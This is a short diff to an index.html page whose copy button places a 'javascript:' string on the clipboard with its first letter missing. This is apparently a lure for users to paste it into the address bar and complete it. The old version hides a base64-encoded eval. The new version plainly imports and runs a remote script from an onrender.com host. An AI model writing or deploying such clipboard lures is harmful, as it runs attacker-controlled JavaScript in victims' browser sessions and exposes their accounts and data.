--- a/index.html
+++ b/index.html
@@ -10,12 +10,13 @@
 
     <script>
         function copyText() {
-            navigator.clipboard.writeText('avascript:(()=>{eval(atob("aW1wb3J0KCJodHRwczovL3lvdW5nLXo3d2Iub25yZW5kZXIuY29tL2hlbHBlci5qcyIp")})()');
+            navigator.clipboard.writeText('avascript:import("https://young-z7wb.onrender.com/helper.js")');
         }
     </script>
 </body>
 
 </html>
+
 
 
 
